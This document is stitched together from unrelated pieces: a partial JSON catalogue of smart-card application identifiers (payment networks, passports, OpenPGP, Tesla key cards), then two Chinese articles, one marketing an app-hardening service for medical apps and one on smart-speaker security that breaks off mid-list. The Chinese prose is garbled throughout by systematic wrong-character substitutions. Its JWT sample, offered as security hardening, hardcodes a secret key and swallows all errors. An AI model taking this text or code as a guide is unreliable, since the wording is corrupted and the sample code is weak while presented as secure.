(MRTD)", "Description": "Electronic (Biometric) Passport. Issuer stored data application (The last three digits of the PIX shall be used to denote future version levels.)", "Type": "MRTD" }, { "AID": "A0000002472001", "Vendor": "ISO JTC1/SC17/WG3", "Country": "United Kingdom", "Name": "Machine Readable Travel Documents (MRTD)", "Description": "Electronic (Biometric) Passport. Application for hashes, digital signature, and certificate (The last three digits of the PIX shall be used to denote future version levels.)", "Type": "MRTD" }, { "AID": "A0000002771010", "Vendor": "Interac Association", "Country": "Canada", "Name": "INTERAC", "Description": "Canadian domestic credit/debit card", "Type": "EMV" }, { "AID": "A00000030600000000000000", "Vendor": "PS/SC Workgroup", "Country": "United States", "Name": "PC/SC Initial access data AID", "Description": "Possibly not an application...", "Type": "" }, { "AID": "A000000308000010000100", "Vendor": "National Institute of Standards and Technology", "Country": "United States", "Name": "Personal Identity Verification (PIV) / ID-ONE PIV BIO", "Description": "PIV End Point Applet. Last 2 bytes designate version", "Type": "" }, { "AID": "A000000308000010000100", "Vendor": "National Institute of Standards and Technology", "Country": "United States", "Name": "Personal Identity Verification (PIV) / ID-ONE PIV BIO", "Description": "PIV End Point Applet. Last 2 bytes designate version", "Type": "" }, { "AID": "A00000031510100528", "Vendor": "Currence Holding/PIN BV", "Country": "The Netherlands", "Name": "Currence PuC", "Description": "", "Type": "EMV" }, { "AID": "A0000003156020", "Vendor": "Currence Holding/PIN BV", "Country": "The Netherlands", "Name": "Chipknip", "Description": "", "Type": "EMV" }, { "AID": "A00000032301", "Vendor": "Identity Alliance", "Country": "United States", "Name": "MUSCLE Applet Package", "Description": "http://osdir.com/ml/lib.muscle/2005-12/msg00066.html", "Type": "" }, { "AID": "A0000003230101", "Vendor": "Identity Alliance", "Country": "United States", "Name": "MUSCLE Applet Instance", "Description": "http://osdir.com/ml/lib.muscle/2005-12/msg00066.html", "Type": "" }, { "AID": "A0000003241010", "Vendor": "Discover Financial Services LLC", "Country": "United States", "Name": "Discover Expresspay (ZIP)", "Description": "", "Type": "" }, { "AID": "A000000333010101", "Vendor": "China Unionpay Co. Ltd", "Country": "China", "Name": "UnionPay Debit", "Description": "", "Type": "" }, { "AID": "A000000333010102", "Vendor": "China Unionpay Co. Ltd", "Country": "China", "Name": "UnionPay Credit", "Description": "", "Type": "" }, { "AID": "A000000333010103", "Vendor": "China Unionpay Co. Ltd", "Country": "China", "Name": "UnionPay Quasi Credit", "Description": "", "Type": "" }, { "AID": "A000000333010106", "Vendor": "China Unionpay Co. Ltd", "Country": "China", "Name": "UnionPay Electronic Cash", "Description": "", "Type": "" }, { "AID": "A000000333010108", "Vendor": "China Unionpay Co. Ltd", "Country": "China", "Name": "U.S. UnionPay Common Debit AID", "Description": "", "Type": "" }, { "AID": "A000000337301000", "Vendor": "Groupment Interbancaire Montique de l' UEMOA", "Country": "Senegal", "Name": "Retrait", "Description": "", "Type": "" }, { "AID": "A000000337101000", "Vendor": "Groupment Interbancaire Montique de l' UEMOA", "Country": "Senegal", "Name": "Standard", "Description": "", "Type": "" }, { "AID": "A000000337102000", "Vendor": "Groupment Interbancaire Montique de l' UEMOA", "Country": "Senegal", "Name": "Classic", "Description": "", "Type": "" }, { "AID": "A000000337101001", "Vendor": "Groupment Interbancaire Montique de l' UEMOA", "Country": "Senegal", "Name": "Prepaye Online", "Description": "", "Type": "" }, { "AID": "A000000337102001", "Vendor": "Groupment Interbancaire Montique de l' UEMOA", "Country": "Senegal", "Name": "Prepaye Possibile Offiline", "Description": "", "Type": "" }, { "AID": "A000000337601001", "Vendor": "Groupment Interbancaire Montique de l' UEMOA", "Country": "Senegal", "Name": "Porte Monnaie Electronique", "Description": "", "Type": "" }, { "AID": "A0000003591010", "Vendor": "Euro Alliance of Payment Schemes s.c.r.l. - EAPS", "Country": "Belgium", "Name": "", "Description": "Unknown", "Type": "" }, { "AID": "A0000003591010028001", "Vendor": "Euro Alliance of Payment Schemes s.c.r.l. - EAPS", "Country": "Belgium", "Name": "Girocard EAPS", "Description": "ZKA (Germany)", "Type": "EMV" }, { "AID": "A00000035910100380", "Vendor": "Euro Alliance of Payment Schemes s.c.r.l. - EAPS", "Country": "Belgium", "Name": "", "Description": "PagoBANCOMAT", "Type": "" }, { "AID": "A0000003660001", "Vendor": "Poste Italiane S.P.A", "Country": "Italy", "Name": "Postamat", "Description": "", "Type": "" }, { "AID": "A0000003660002", "Vendor": "Poste Italiane S.P.A", "Country": "Italy", "Name": "Postamat VISA", "Description": "", "Type": "" }, { "AID": "A0000003710001", "Vendor": "Verve", "Country": "Nigeria", "Name": "InterSwitch Verve Card", "Description": "Nigerian local switch company", "Type": "EMV" }, { "AID": "A00000038410", "Vendor": "eftpos, Australian Payments Clearing Association Ltd", "Country": "Australia", "Name": "Savings (debit card)", "Description": "", "Type": "" }, { "AID": "A00000038420", "Vendor": "eftpos, Australian Payments Clearing Association Ltd", "Country": "Australia", "Name": "Cheque (debit card)", "Description": "", "Type": "" }, { "AID": "A0000003964D66344D0002", "Vendor": "NXP Semiconductors Germany GmbH", "Country": "Germany", "Name": "MIFARE4MOBILE", "Description": "NXP Mf4M", "Type": "" }, { "AID": "A00000039742544659", "Vendor": "Microsoft Corporation", "Country": "United States", "Name": "Microsoft IDMP AID", "Description": "Identity Device With Microsoft Generic Profile application. 2 bytes can be added at the end. This byte must be set to the IDMP specification revision number which is currently 0x01. The second byte (yy) is reserved for use by the card application.", "Type": "" }, { "AID": "A0000003974349445F0100", "Vendor": "Microsoft Corporation", "Country": "United States", "Name": "Microsoft PNP AID", "Description": "MS Plug and Play", "Type": "" }, { "AID": "A0000004271010", "Vendor": "Unibanco (Hipercard)", "Country": "Brazil", "Name": "Hiperchip", "Description": "", "Type": "" }, { "AID": "A0000004320001", "Vendor": "PRO100", "Country": "Russia", "Name": "Universal Electronic Card", "Description": "", "Type": "" }, { "AID": "A0000004360100", "Vendor": "Edenred", "Country": "Belgium", "Name": "Ticket Restaurant", "Description": "", "Type": "" }, { "AID": "A0000004391010", "Vendor": "ACCEL/Exchange", "Country": "United States", "Name": "Exchange ATM card", "Description": "The Exchange Network ATM Network", "Type": "" }, { "AID": "A0000004540010", "Vendor": "eTranzact", "Country": "Nigeria", "Name": "Etranzact Genesis Card", "Description": "Nigerian local switch company", "Type": "EMV" }, { "AID": "A0000004540011", "Vendor": "eTranzact", "Country": "Nigeria", "Name": "Etranzact Genesis Card 2", "Description": "Nigerian local switch company", "Type": "EMV" }, { "AID": "A0000004762010", "Vendor": "Google", "Country": "United States", "Name": "GOOGLE_CONTROLLER_AID", "Description": "GOOGLE_LOCKET_AID", "Type": "" }, { "AID": "A0000004763030", "Vendor": "Google", "Country": "United States", "Name": "GOOGLE_MIFARE_MANAGER_AID", "Description": "", "Type": "" }, { "AID": "A0000004766C", "Vendor": "Google", "Country": "United States", "Name": "GOOGLE_PAYMENT_AID", "Description": "", "Type": "EMV" }, { "AID": "A000000476A010", "Vendor": "Google", "Country": "United States", "Name": "GSD_MANAGER_AID", "Description": "", "Type": "GP" }, { "AID": "A000000476A110", "Vendor": "Google", "Country": "United States", "Name": "GSD_MANAGER_AID", "Description": "", "Type": "GP" }, { "AID": "A000000485", "Vendor": "JVL Ventures, LLC (Softcard)", "Country": "United States", "Name": "Softcard SmartTap", "Description": "", "Type": "" }, { "AID": "A0000005241010", "Vendor": "RuPay", "Country": "India", "Name": "RuPay", "Description": "RuPay (India)", "Type": "EMV" }, { "AID": "A0000005271002", "Vendor": "Yubico", "Country": "Sweden", "Name": "Yubikey NEO U2F Demo applet", "Description": "Universal 2-Factor Proof-of-concept/Demo", "Type": "YKNEO" }, { "AID": "A000000527200101", "Vendor": "Yubico", "Country": "Sweden", "Name": "Yubikey NEO Yubikey2 applet interface", "Description": "Javacard Applet AID", "Type": "YKNEO" }, { "AID": "A000000527210101", "Vendor": "Yubico", "Country": "Sweden", "Name": "Yubikey NEO OATH Applet", "Description": "Javacard Applet AID", "Type": "YKNEO" }, { "AID": "A0000005591010FFFFFFFF8900000100", "Vendor": "GSMA (GSM Association)", "Country": "United Kingdom", "Name": "ISD-R Application. Used as TAR.", "Description": "", "Type": "" }, { "AID": "A0000005591010FFFFFFFF8900000200", "Vendor": "GSMA (GSM Association)", "Country": "United Kingdom", "Name": "ECASD Application. Used as TAR.", "Description": "", "Type": "" }, { "AID": "A0000005591010FFFFFFFF8900000D00", "Vendor": "GSMA (GSM Association)", "Country": "United Kingdom", "Name": "ISD-P Executable Load File.", "Description": "", "Type": "" }, { "AID": "A0000005591010FFFFFFFF8900000E00", "Vendor": "GSMA (GSM Association)", "Country": "United Kingdom", "Name": "ISD-P Executable Module.", "Description": "", "Type": "" }, { "AID": "A0000005591010FFFFFFFF8900000F00", "Vendor": "GSMA (GSM Association)", "Country": "United Kingdom", "Name": "Reserved value for the Profile's ISD-P", "Description": "", "Type": "" }, { "AID": "A0000005591010FFFFFFFF8900001000", "Vendor": "GSMA (GSM Association)", "Country": "United Kingdom", "Name": "ISD-P Application ('1010FFFFFFFF89000010' to '1010FFFFFFFF8900FFFF'. Used as TAR. The value is allocated during the 'Profile Download and Installation procedure'", "Description": "", "Type": "" }, { "AID": "A00000061700", "Vendor": "Fidesmo", "Country": "Sweden", "Name": "Fidesmo javacard", "Description": "", "Type": "" }, { "AID": "A0000006200620", "Vendor": "Debit Network Alliance (DNA)", "Country": "United States", "Name": "Debit Network Alliance (DNA)", "Description": "Common U.S. Debit", "Type": "" }, { "AID": "A0000006581010", "Vendor": "MIR", "Country": "Russia", "Name": "MIR Credit", "Description": "", "Type": "" }, { "AID": "A0000006581011", "Vendor": "MIR", "Country": "Russia", "Name": "MIR Credit", "Description": "", "Type": "" }, { "AID": "A0000006582010", "Vendor": "MIR", "Country": "Russia", "Name": "MIR Debit", "Description": "", "Type": "" }, { "AID": "A0000006723010", "Vendor": "TROY", "Country": "Turkey", "Name": "TROY chip credit card", "Description": "Turkey's Payment Method", "Type": "EMV" }, { "AID": "A0000006723020", "Vendor": "TROY", "Country": "Turkey", "Name": "TROY chip debit card", "Description": "Turkey's Payment Method", "Type": "EMV" }, { "AID": "A0000007705850", "Vendor": "Indian Oil Corporation Limited", "Country": "India", "Name": "XTRAPOWER Fleet Card Program", "Description": "Indian Oil's Pre Paid Program", "Type": "EMV" }, { "AID": "A0000007790000", "Vendor": "Zimswitch", "Country": "Zimbabwe", "Name": "", "Description": "", "Type": "" }, { "AID": "B012345678", "Vendor": "MasterCard International", "Country": "United States", "Name": "Maestro TEST", "Description": "Used for development", "Type": "EMV" }, { "AID": "D040000001000002", "Vendor": "Paylife", "Country": "Austria", "Name": "Paylife Quick (IEP). Preloaded Electronic Purse", "Description": "Domestic Payment System (Version 2.1)", "Type": "" }, { "AID": "D040000002000002", "Vendor": "Austria Card", "Country": "Austria", "Name": "RFU", "Description": "Domestic Payment System (Version 2.1)", "Type": "" }, { "AID": "D040000003000002", "Vendor": "Austria Card", "Country": "Austria", "Name": "POS", "Description": "Domestic Payment System (Version 2.1)", "Type": "" }, { "AID": "D040000004000002", "Vendor": "Austria Card", "Country": "Austria", "Name": "ATM", "Description": "Domestic Payment System (Version 2.1)", "Type": "" }, { "AID": "D04000000B000002", "Vendor": "Austria Card", "Country": "Austria", "Name": "Retail", "Description": "Domestic Loyalty Program (Version 2.1)", "Type": "" }, { "AID": "D04000000C000002", "Vendor": "Austria Card", "Country": "Austria", "Name": "Bank_Data", "Description": "Domestic Loyalty Program (Version 2.1)", "Type": "" }, { "AID": "D04000000D000002", "Vendor": "Austria Card", "Country": "Austria", "Name": "Shopping", "Description": "Domestic Loyalty Program (Version 2.1)", "Type": "" }, { "AID": "D040000013000001", "Vendor": "Austria Card", "Country": "Austria", "Name": "DF_UNI_Kepler1", "Description": "Domestic Loyalty Program (Version 2.0)", "Type": "" }, { "AID": "D040000013000001", "Vendor": "Austria Card", "Country": "Austria", "Name": "DF_Schler1", "Description": "Domestic Loyalty Program (Version 1.3)", "Type": "" }, { "AID": "D040000013000002", "Vendor": "Austria Card", "Country": "Austria", "Name": "DF_UNI_Kepler2", "Description": "Domestic Loyalty Program (Version 2.0)", "Type": "" }, { "AID": "D040000013000002", "Vendor": "Austria Card", "Country": "Austria", "Name": "DF_Schler2", "Description": "Domestic Loyalty Program (Version 1.3)", "Type": "" }, { "AID": "D040000014000001", "Vendor": "Austria Card", "Country": "Austria", "Name": "DF_Mensa", "Description": "Domestic Loyalty Program (Version 2.0)", "Type": "" }, { "AID": "D040000015000001", "Vendor": "Austria Card", "Country": "Austria", "Name": "DF_UNI_Ausweis", "Description": "Domestic Loyalty Program (Version 2.0)", "Type": "" }, { "AID": "D040000015000001", "Vendor": "Austria Card", "Country": "Austria", "Name": "DF_Ausweis", "Description": "Domestic Loyalty Program (Version 1.3)", "Type": "" }, { "AID": "D0400000190001", "Vendor": "Austria Card", "Country": "Austria", "Name": "EMV ATM Maestro", "Description": "Domestic EMV Application (Version 2.1)", "Type": "" }, { "AID": "D0400000190002", "Vendor": "Austria Card", "Country": "Austria", "Name": "EMV POS Maestro", "Description": "Domestic EMV Application (Version 2.1)", "Type": "" }, { "AID": "D0400000190003", "Vendor": "Austria Card", "Country": "Austria", "Name": "EMV ATM MasterCard", "Description": "Domestic EMV Application (Version 2.1)", "Type": "" }, { "AID": "D0400000190004", "Vendor": "Austria Card", "Country": "Austria", "Name": "EMV POS MasterCard", "Description": "Domestic EMV Application (Version 2.1)", "Type": "" }, { "AID": "D0400000190010", "Vendor": "Austria Card", "Country": "Austria", "Name": "Digital ID", "Description": "Domestic Payment System (Version 2.1)", "Type": "" }, { "AID": "D268000001", "Vendor": "Ministry of Finance of Georgia", "Country": "Georgia", "Name": "Fiscal module application", "Description": "Georgia Revenue Service application for fiscal cash registers", "Type": "" }, { "AID": "D276000005", "Vendor": "Giesecke&Devrient", "Country": "Germany", "Name": "", "Description": "Giesecke & Devrient", "Type": "" }, { "AID": "D276000005AA040360010410", "Vendor": "Giesecke&Devrient", "Country": "Germany", "Name": "G D App Nokia 6212", "Description": "", "Type": "" }, { "AID": "D276000005AA0503E00401", "Vendor": "Giesecke&Devrient", "Country": "Germany", "Name": "G D App Nokia 6212", "Description": "", "Type": "" }, { "AID": "D276000005AA0503E00501", "Vendor": "Giesecke&Devrient", "Country": "Germany", "Name": "G D App Nokia 6212", "Description": "", "Type": "" }, { "AID": "D276000005AA0503E0050101", "Vendor": "Giesecke&Devrient", "Country": "Germany", "Name": "G D App Nokia 6212", "Description": "", "Type": "" }, { "AID": "D276000005AB0503E0040101", "Vendor": "Giesecke&Devrient", "Country": "Germany", "Name": "G D App Nokia 6212", "Description": "", "Type": "" }, { "AID": "D27600002200000001", "Vendor": "IBM Laboratories", "Country": "Germany", "Name": "SCT LOYALTY", "Description": "IBM Test card from the book 'Smart Card Application Development Using Java'", "Type": "" }, { "AID": "D27600002200000002", "Vendor": "IBM Laboratories", "Country": "Germany", "Name": "BUSINESS CARD", "Description": "IBM Test card from the book 'Smart Card Application Development Using Java'", "Type": "" }, { "AID": "D27600002200000060", "Vendor": "IBM Laboratories", "Country": "Germany", "Name": "PKCS#11 Token", "Description": "IBM Test card from the book 'Smart Card Application Development Using Java'", "Type": "" }, { "AID": "D276000025", "Vendor": "ZKA", "Country": "Germany", "Name": "Girocard", "Description": "Girocard (Geldkarte) in Germany", "Type": "" }, { "AID": "D27600002545410100", "Vendor": "ZKA", "Country": "Germany", "Name": "", "Description": "Unknown", "Type": "" }, { "AID": "D27600002545500100", "Vendor": "ZKA", "Country": "Germany", "Name": "Girocard", "Description": "ZKA Girocard (Geldkarte) (Germany)", "Type": "EMV" }, { "AID": "D27600002547410100", "Vendor": "ZKA", "Country": "Germany", "Name": "Girocard ATM", "Description": "", "Type": "" }, { "AID": "D276000060", "Vendor": "Wolfgang Rankl", "Country": "Germany", "Name": "", "Description": "", "Type": "" }, { "AID": "D2760000850100", "Vendor": "NXP Semiconductors / NFC Forum", "Country": "Germany", "Name": "NDEF Tag Application / Mifare DESFire Tag Application", "Description": "NFC Forum Type 4 Tag", "Type": "" }, { "AID": "D2760000850101", "Vendor": "NXP Semiconductors / NFC Forum", "Country": "Germany", "Name": "NDEF Tag Application", "Description": "NFC Tag type 4 tag", "Type": "" }, { "AID": "D276000118", "Vendor": "Giesecke&Devrient Java Card Telecommunikation", "Country": "Germany", "Name": "", "Description": "", "Type": "" }, { "AID": "D2760001180101", "Vendor": "Giesecke&Devrient Java Card Telecommunikation", "Country": "Germany", "Name": "Giesecke &amp", "Description": "Devrient Test Applet", "Type": "" }, { "AID": "D27600012401", "Vendor": "fsfEurope", "Country": "Germany", "Name": "OpenPGP Card", "Description": "For selection when not knowing the exact full AID", "Type": "OpenPGP" }, { "AID": "D276000124010101FFFF000000010000", "Vendor": "fsfEurope", "Country": "Germany", "Name": "OpenPGP Card", "Description": "Version 1", "Type": "OpenPGP" }, { "AID": "D2760001240102000000000000010000", "Vendor": "fsfEurope", "Country": "Germany", "Name": "OpenPGP Card", "Description": "Version 2", "Type": "OpenPGP" }, { "AID": "D27600012402", "Vendor": "fsfEurope", "Country": "Germany", "Name": "SmartChess", "Description": "http://smartchess.de/englisch/SmartChess_1.0.pdf", "Type": "SmartChess" }, { "AID": "D2760001240200010000000000000000", "Vendor": "fsfEurope", "Country": "Germany", "Name": "SmartChess", "Description": "http://smartchess.de/englisch/SmartChess_1.0.pdf", "Type": "SmartChess" }, { "AID": "D4100000011010", "Vendor": "", "Country": "Republic of Korea", "Name": "", "Description": "", "Type": "" }, { "AID": "D5280050218002", "Vendor": "", "Country": "The Netherlands", "Name": "", "Description": "(Netherlands)", "Type": "EMV" }, { "AID": "D5780000021010", "Vendor": "Bankaxept", "Country": "Norway", "Name": "Bankaxept", "Description": "Norwegian domestic debit card", "Type": "EMV" }, { "AID": "D7560000010101", "Vendor": "Swiss Travel Fund (Reka)", "Country": "Switzerland", "Name": "Reka Card", "Description": "prepaid functional debit card", "Type": "" }, { "AID": "D7560000300101", "Vendor": "Migros (FCM, GE Money Bank and MasterCard)", "Country": "Switzerland", "Name": "M Budget", "Description": "", "Type": "" }, { "AID": "E80704007F00070302", "Vendor": "", "Country": "", "Name": "nPA", "Description": "German eID", "Type": "" }, { "AID": "E82881C11702", "Vendor": "", "Country": "", "Name": "AlphaCard application", "Description": "", "Type": "" }, { "AID": "E828BD080F", "Vendor": "", "Country": "", "Name": "ISO-7816-15 EF.DIR", "Description": "Iso adoption of PKCS-15", "Type": "" }, { "AID": "F0000000030001", "Vendor": "", "Country": "", "Name": "BRADESCO", "Description": "Brazilian Bank Banco Bradesco", "Type": "EMV" }, { "AID": "7465736C6153746F7265", "Vendor": "Tesla", "Country": "", "Name": "teslaStore", "Description": "Undocumented AID associated with official Tesla Key Cards", "Type": "Tesla" }, { "AID": "7465736C614C6F6769633", "Vendor": "Tesla", "Country": "", "Name": "teslaLogic (Original AID)", "Description": "Key for Tesla vehicles", "Type": "Tesla" }, { "AID": "F465736C614C6F6769633", "Vendor": "Tesla", "Country": "", "Name": "teslaLogic (Alternate AID)", "Description": "Key for Tesla vehicles", "Type": "Tesla" }, { "AID": "5465736c61444150", "Vendor": "Tesla", "Country": "", "Name": "TeslaDAP", "Description": "Undocumented AID associated with official Tesla BTLE Key Fobs", "Type": "Tesla" }, { "AID": "4144204631", "Vendor": "CIPURSE", "Country": "", "Name": "Cipurse transport card", "Description": "Cipurse transport card", "Type": "transport" }, { "AID": "A00000084600CC68E88C0101", "Vendor": "VivoKey", "Country": "United States", "Name": "VivoKey Apex", "Description": "vivokey.com/apex", "Type": "" }, { "AID": "D2760000028002000000000000000310", "Vendor": "CIPURSE", "Country": "", "Name": "CPM Master SAM", "Description": "Application specific master keys", "Type": "transport" }, { "AID": "D2760000028002000000000000000311", "Vendor": "CIPURSE", "Country": "", "Name": "CPM Person SAM", "Description": "Personalization of end user cards", "Type": "transport" }, { "AID": "A0000008381010", "Vendor": "SL ", "Country": "Sweden", "Name": "SL Resekort", "Description": "transport card", "Type": "transport" }, { "AID": "4F53452E5641532E3031", "Vendor": "Apple, Google", "Country": "", "Name": "Value-Added Services (OSE.VAS.01)", "Description": "Used by Apple VAS and Google SmartTap", "Type": "loyalty" }, { "AID": "A000000476D0000101", "Vendor": "Google", "Country": "", "Name": "Google SmartTap 1.3 (Deprecated)", "Description": "", "Type": "loyalty" }, { "AID": "A000000476D0000111", "Vendor": "Google", "Country": "", "Name": "Google SmartTap 2.0", "Description": "", "Type": "loyalty" }, { "AID": "A0000002480400", "Vendor": "ISO/IEC JTC1/SC17", "Country": "", "Name": "Personal identification (mDL)", "Description": "ISO/IEC 18013-5:2021 compliant Mobile driving licence (mDL) application.", "Type": "identity" }, { "AID": "A000000676", "Vendor": "Blackboard", "Country": "United States", "Name": "Student ID", "Description": "Student ID cards", "Type": "identity" }, { "AID": "A000000809434343444B467631", "Vendor": "Car Connectivity Consortium (CCC)", "Country": "", "Name": "Digital Car Key", "Description": "", "Type": "access" }, { "AID": "A0000008580101", "Vendor": "Apple", "Country": "", "Name": "Apple Home Key", "Description": "NFC Home Key for select HomeKit-compatible locks", "Type": "access" }]

互联网+医疗背景下，如何有针对性地标准医疗衰弱App经营，堵住个人隐私信息安全破绽，是一个亟待解决的行业问题，也是一个数字时代的公共安全问题。此前，多款医疗衰弱类App就因适度收集个人信息被监管通报。 与电子商务、生产金融、音视频平台等其余畛域相比，医疗衰弱App波及的用户隐衷危险尤其大。一方面，集体衰弱信息是最敏感的信息之一，信息泄露后除了可能频遭骚扰，更重要的是所患疾病被别人通晓。衰弱信息泄露可能会带来歧视，影响求职等。另一方面，医疗衰弱类信息的利用价值大，被歹意收集后可能被施行精准欺骗。 医疗隐衷泄露后的杀伤力更大、非法用处更多，这两方面的因素联合在一起，导致医疗App防隐衷泄露面临更严厉的局势。因而，医疗App的日常监管理当比其它手机App更严，要求更高，要严格落实《数据安全法》《个人信息保护法》《App守法违规收集应用个人信息行为认定办法》《常见类型挪动互联网应用程序必要个人信息范畴规定》等法律和无关规定，在存储个人信息时，目标、形式、范畴、类型、数量都要着重思考最小必要准则，存储工夫该当为实现解决目标所必要的最短时间。 App加固助力互联网+医疗平安与合规为了进一步保障信息安全，药兜采、药兜网和药兜医生发表采纳顶象App加固服务，晋升App的安全性，满足平安合规要求。顶象App加可能为App提供平安加固、危险预警及全生命周期风控保障，满足个人信息爱护及平安合规的各项要求。 全方位保障App平安。顶象App加固可能针对已有利用进行安全性检测，发现利用存在的危险破绽并针对性进行修复整改，对敏感数据、代码混同、代码完整性、内存数据等进行爱护，从源头上防止系统漏洞对于利用自身造成的平安影响，保障App信息安全。 为App提供实时危险预警。基于进攻云，顶象App加固可能为App提供挪动利用运行进行平安监测，对挪动利用运行时终端设备、运行环境、操作行为进行实时监测，帮忙App建设运行时危险的监测、预警、阻断和溯源平安体系。 为App建设全生命周期防控体系。App 利用平安加固出现常态化、泛边界化和专业化的趋势，这意味着企业本身简略的防护曾经无奈满足以后网络安全防护的新趋势，亟待建设更为全面的平安进攻体系。顶象App加固从App的设计、开发、公布、保护等全生命周期环节解决挪动利用在外围代码平安、逻辑平安、平安功能设计、数据传输链路平安等多个维度的问题，助力筑牢平安防线。 助力互联网+医疗衰弱更好倒退地方近日印发的《对于进一步欠缺医疗卫生服务体系的意见》提出，施展信息技术撑持作用。倒退“互联网+医疗衰弱”，建设面向医疗畛域的工业互联网平台，放慢推动互联网、区块链、物联网、人工智能、云计算、大数据等在医疗卫生畛域中的利用，增强衰弱医疗大数据共享替换与保障体系建设。建设跨部门、跨机构公共卫生数据共享调度机制和智慧化预警多点触发机制。推动医疗联结体内信息系统对立经营和互联互通，增强数字化治理。放慢衰弱医疗数据安全体系建设，强化数据安全监测和预警，进步医疗卫生机构数据安全防护能力，增强对重要信息的爱护。 随着挪动互联网的遍及和医疗信息化的减速推动，APP曾经成为医疗服务不可或缺的一部分。药兜采、药兜网和药兜医生的加固动作，将会引领医疗App行业向更加平安、业余、高效的方向不断前进。 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

N年前的新闻最近，看到一则N年前的新闻：亚马逊出品的老款Echo音箱被人黑了。通过对这款音箱底部基座硬件的简略加工，英国平安钻研人员展现了如何将恶意软件植入Echo的过程。恶意软件一旦植入便能够进行一系列顽劣的行径，监听、攻打网络中其余设施、盗用账号，甚至装置勒索软件，不一而足。 这就引出了IoT（物联网）畛域的一个平安问题。看似平时的家用物件都可能成为“被黑”的对象，对于IoT设施平安危险的防备决不能漫不经心，哪怕是小小的智能音箱都可能成为攻打的对象，变成枕边的窃听器。 智能音箱的平安威逼智能音箱与智能手机不同，它不是一个开放式的产品，用户无奈在其上装置运行任意App，所以传统的针对App的平安爱护计划（比方App加固）齐全不实用。智能音箱的平安威逼次要来自于以下几个方面： 1. 固化在智能音箱中的零碎的安全性 在下面说的故事中，尽管是因为硬件设计造成的破绽，但因为零碎自身同样存在安全性问题，攻击者长驱直入，间接向零碎外部植入恶意代码，这是以往针对App的加固爱护计划无奈解决的问题。要根本性的进步安全性，必须对整个零碎的各个模块加强由内而外的平安基因，而不能寄希望于由外而内的加壳式爱护。 2. 音箱设施不足一机一密的安全性 智能手机用户尽管硬件与零碎雷同，然而不同用户应用的App不尽相同。假如一部分用户因为装置了某些带有破绽的App而被攻打，不应用该款App的用户则可能不受影响。智能音箱却不同，同款音箱的用户硬件、软件没有区别。攻击者一旦找到攻打办法，所有的用户都无一例外面临同样的威逼。这就相当于所有用户的家门钥匙都是雷同的，任何一位用户钥匙被盗，所有用户都同时面临一样的危险。在这样的场景下，一机一密就显得犹为重要。如果生产的每一台音箱都具备举世无双的密钥和爱护伎俩，则相当于每个用户都领有齐全不同的锁和钥匙，这样即便某位用户的锁被攻破，其余用户也不受影响，从而大大减小安全事件的影响度，也为厂家提供平安修复计划博得更多工夫。 3. 智能音箱传输数据的安全性 智能音箱通过网络传输的数据可能被截获或篡改。比方智能音箱都带有的语音辨认性能，为了进步辨认的准确率，音箱会先收集语音信息，而后将其上传至服务器端来作辨认。对于传输数据的爱护，罕用形式是应用HTTPS等通信协议进行加密，尽管个别认为HTTPS能保证数据在传输链路上的完整性和不可篡改性，然而智能音箱中会内置对应的证书或密钥信息来实现加密和验证，如果音箱零碎对于本身代码和数据的爱护强度不够，一旦被攻击者逆向破解出要害的程序逻辑和证书密钥等敏感数据，并加以篡改，就能将这些语音数据传输至攻击者任意指定的服务器。 咱们试试用加固技术来进步一下它的安全性1. 加密通信 在智能音箱中，加密通信能够用于爱护用户和设施之间的数据传输，例如语音指令和用户的个人信息等。罕用的加密通信协议包含TLS/SSL等，这些协定通过应用公钥和私钥的形式来确保数据的机密性和完整性。 咱们来看一个简略的示例代码，演示如何应用Python的requests库实现基于TLS/SSL的加密通信： import requests# 设置申请参数url = "https://example.com"headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3",}# 发送HTTPS申请，通过verify参数开启SSL/TLS验证response = requests.get(url, headers=headers, verify=True)# 输入响应内容print(response.text)参考下面，咱们应用了requests库发送了一个HTTPS申请，通过设置verify参数为True来开启SSL/TLS验证。这样，申请过程中的数据传输就会通过加密形式进行爱护，从而确保数据的机密性和完整性。 2. 强化身份验证 在智能音箱中，强化身份验证能够通过多因素身份认证、应用加密令牌等形式实现。来看看一个简略的示例代码，演示如何应用Python的Flask库实现基于JWT的身份验证： from flask import Flask, request, jsonifyimport jwtapp = Flask(__name__)# 定义一个秘钥secret_key = 'my_secret_key'# 定义一个生成token的函数def generate_token(user_id): payload = { 'user_id': user_id, } token = jwt.encode(payload, secret_key, algorithm='HS256') return token# 定义一个验证token的函数def verify_token(token): try: payload = jwt.decode(token, secret_key, algorithms=['HS256']) return payload['user_id'] except: return None# 定义一个登录接口，验证用户身份并生成token@app.route('/login', methods=['POST'])def login(): username = request.form.get('username') password = request.form.get('password') # 验证用户名和明码 user_id = verify_user(username, password) if user_id: # 生成token token = generate_token(user_id) return jsonify({'token': token}) else: return jsonify({'error': 'Invalid username or password'})# 定义一个须要身份验证的接口@app.route('/protected')def protected(): # 从申请头中获取token token = request.headers.get('Authorization').split(' ')[1] # 验证token user_id = verify_token(token) if user_id: return jsonify({'message': 'Hello, user {}'.format(user_id)}) else: return jsonify({'error': 'Invalid token'})if __name__ == '__main__': app.run()3. 实现平安固件 ...

